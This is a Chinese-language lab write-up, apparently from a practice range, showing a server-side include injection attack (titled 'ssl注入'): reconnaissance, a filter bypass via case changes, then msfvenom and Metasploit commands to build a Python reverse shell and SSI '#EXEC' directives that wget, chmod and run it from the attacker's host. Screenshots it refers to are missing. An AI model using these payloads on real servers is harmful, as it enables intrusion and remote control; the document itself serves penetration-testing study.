ssl注入
ssl注入介绍
简单了解一下ssl注入攻击:
信息探测
这个与之前的都一样:
接下来要根据扫描的道德信息,进行漏洞利用
漏洞利用
可以尝试打开一些比较敏感的位置:
像这个就是禁止访问的,我们就可以忽略了,但是有的时候我们也要查看网页源代码看看是否有关键信息。
打开这个可以看我不让我们访问的目录,尝试访问,下载对应的文件,看看有没有关键信息。
可以把这两个文件都下载了,之后查看有没有信息,我下载完之后看了一下,没有关键信息,我就没有截图了。
再尝试打开别的网址,看看有没有可以利用的漏洞:
这个是有可能注入的点。
第一眼看到这个不知道有什么用,但是发现到下面的就知道这个是干什么的了。
可以利用之前的发现的命令格式,进行注入攻击。
利用之前发现的命令,尝试一下:
发现我们输入的命令他给我们注释掉了,怎么办?
我们可以使用大小写进行替换,之后加上!
简单的替换大小写,还是不行,我们加上!
这回发现可以了:
成功利用了漏洞!!!
上传webshell
首先我们要制作一个webshell,这次我们尝试使用python制作一个,这次不用php了。
msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.17.128 lport=4444 -f raw > /root/桌面/shell_ssl.py
之后我们启动监听:
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set lhost 192.168.17.128
run一下:
下载对应的脚本,执行获取反弹shell,在此之前,移动文件 :
mv shell.py /var/www/html/
之后还要开启对应的apache2服务;
service apache2 start
service apache2 status //检测是否开启
利用之前发现的漏洞,下载利用webshell,反弹对应的权限:
<!--#EXEC cmd="wget http://192.168.17.128/shell_ssl.py"-->
<!--#EXEC cmd="chmod 777 shell_ssl.py"-->
<!--#EXEC cmd="python shell_ssl.py"-->
首先要下载webshell
下载成功!
之后对于下载的文件赋予权限:
赋予权限成功!
执行webshell
停顿中,应该是反弹成功了!
反弹成功!
获取权限之后执行操作
可以了!!!
总结
靶场本次没有设置flag,可以了!